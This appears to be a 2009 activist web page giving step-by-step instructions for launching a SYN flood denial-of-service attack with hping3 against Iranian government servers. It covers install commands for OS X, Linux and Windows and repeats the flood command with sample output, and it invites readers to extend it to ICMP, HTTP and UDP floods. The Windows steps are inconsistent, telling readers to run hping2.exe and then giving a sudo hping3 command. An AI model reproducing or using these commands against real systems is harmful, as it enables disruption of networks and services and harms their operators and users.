So you want to mount a "SYN flood" attack against the Iranian Government (Regime). In the interest of expediting this operation I will leave the specific details of what a SYN flood attack is as an exercise for the reader. For now I will give you step-by-step instructions on how to obtain the necessary tools, installation and then deploying the attack. You will need a working knowledge of UNIX/Linux/Windows to get this going. If you are not comfortable in a command shell, well, START LEARNING!
Caveat - doing this against any network asset that is not owned by you, or is not an enemy combatant (whatever that means in cyberwarfare) is punishable by law. I relate this information to you now because it may be a useful tool in helping the Iranians rid themselves of an oppressive regime. Don't be an idiot.
What you will need:
Ok people. You will need to have the OS X Developer Tools installed. You can find these on your OS X installation CD/DVD that came with your computer. (Do a custom install and then check the Developer Tools box - no it won't hose your current OS install).
You can also get the Developer Tools via a free download from Apple (You will need an Apple ID to login - use the same ID you use for iTunes). Get it here.
Once you have the developer tools installed restart your computer.
Now we need to install the MacPorts software (an "app store" for Unix - similar to apt-get or rpm if you are familiar with Linux). Get it here.
Now that you have MacPorts installed we can now install hping3. Here's where we get into the nitty-gritty of a command shell.
Open Terminal (/Applications/Utilities/Terminal) and type:
~% sudo port install hping3
You will then be prompted for your password. Enter it and press return. hping3 will now install.
Once hping3 is installed you can start flooding an IP address or URL. Here's how it's done:
~% sudo hping3 -i u1 -S -p 80 IP-ADDRESS-OR-HOSTNAME
Where IP-ADDRESS-OR-HOSTNAME is replaced with the IP address or web address of the target host.
Again, you will be prompted to enter your password. Once you do you will be presented with something that looks like this:
len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms
len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms
len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms
. . .
That is hping3 doing its thing. It's a good thing. If you want to gracefully stop the attack hit CONTROL+C. Otherwise, just quit the Terminal application.
Open a command shell and install hping3 by entering the command:
~% sudo aptitude install hping3
Then initiate the attack by entering:
~% sudo hping3 -i u1 -S -p 80 IP-ADDRESS-OR-HOSTNAME
Download hping2 binary for Windows (Sorry, XP only. No Vista or Win7). Get it here.
Extract the archive and locate hping2.exe. Run this executable via the command prompt.
~% sudo hping3 -i u1 -S -p 80 IP-ADDRESS-OR-HOSTNAME
I realize that there are many other ways to mount a Denial of Service (DoS) attack. hping3 is a powerful tool that can also be used to deploy not only SYN attacks, but also ICMP, HTTP and UDP attacks. I don't have time to make a walkthrough that has instructions for everything. I welcome contributions to this document.
2009 Connor Dickie. connord@media.mit.edu, @c0nn0r This resource is located at http://web.media.mit.edu/~connord/iran/